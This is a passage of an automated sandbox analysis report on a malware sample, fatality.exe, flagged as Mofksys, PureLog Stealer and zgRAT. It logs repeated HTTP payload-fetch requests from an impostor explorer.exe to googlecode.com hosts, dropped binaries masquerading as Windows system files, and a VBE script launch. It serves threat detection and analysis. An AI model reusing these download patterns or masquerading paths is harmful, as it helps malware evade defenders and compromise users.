                                                                                                                                                          Jan 13, 2025 13:19:05.383789062 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          76192.168.2.45686874.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:19:05.749891996 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:19:06.474775076 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:06 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:19:06.475022078 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          77192.168.2.45686964.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:19:07.424693108 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:19:08.087565899 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:08 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:19:08.087589979 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          78192.168.2.45687066.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:19:08.430860043 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:19:09.142765045 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:09 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:19:09.142785072 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          79192.168.2.45687174.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:19:09.582691908 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:19:10.295950890 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:10 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:19:10.295970917 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:07:17:03
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\fatality.exe"
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:3'457'619 bytes
                                                                                                                                                          MD5 hash:C883EA559BEE9A0CB393AA32DCAF5D80
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000000.1681547764.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:1
                                                                                                                                                          Start time:07:17:03
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:c:\users\user\desktop\fatality.exe
                                                                                                                                                          Imagebase:0x8e0000
                                                                                                                                                          File size:3'319'076 bytes
                                                                                                                                                          MD5 hash:A7040B85FC683F088F4C6E5B44052C43
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1705089952.00000000056A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1704006119.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Desktop\fatality.exe , Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Desktop\fatality.exe , Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 71%, ReversingLabs
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:07:17:04
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'518 bytes
                                                                                                                                                          MD5 hash:D36CC2935AE0E7A5D2936DB589A9B8CC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000002.00000002.1733234738.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000002.00000000.1692168496.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\icsys.icn.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:07:17:05
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:c:\windows\resources\themes\explorer.exe
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'366 bytes
                                                                                                                                                          MD5 hash:7E24D6E5185E961528CFBCC6840EBBE9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000003.00000000.1705891813.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000003.00000002.2940200306.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\explorer.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:07:17:06
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:c:\windows\resources\spoolsv.exe SE
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'480 bytes
                                                                                                                                                          MD5 hash:DA56FBDFF5925EFBA1E9942139E2A354
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000004.00000002.1726064451.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000004.00000000.1712734504.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\spoolsv.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:5
                                                                                                                                                          Start time:07:17:06
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\svchost.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:c:\windows\resources\svchost.exe
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'449 bytes
                                                                                                                                                          MD5 hash:5020DD008EA5092AFC4BBD7961322484
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000005.00000000.1714385550.0000000000401000.00000080.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\svchost.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:07:17:06
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe"
                                                                                                                                                          Imagebase:0xd00000
                                                                                                                                                          File size:147'456 bytes
                                                                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:7
                                                                                                                                                          Start time:07:17:07
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:c:\windows\resources\spoolsv.exe PR
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'480 bytes
                                                                                                                                                          MD5 hash:DA56FBDFF5925EFBA1E9942139E2A354
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000007.00000000.1722308050.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000007.00000002.1726017158.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:8
                                                                                                                                                          Start time:07:17:16
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'366 bytes
                                                                                                                                                          MD5 hash:7E24D6E5185E961528CFBCC6840EBBE9
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000000.1815639732.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:10
                                                                                                                                                          Start time:07:17:17
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
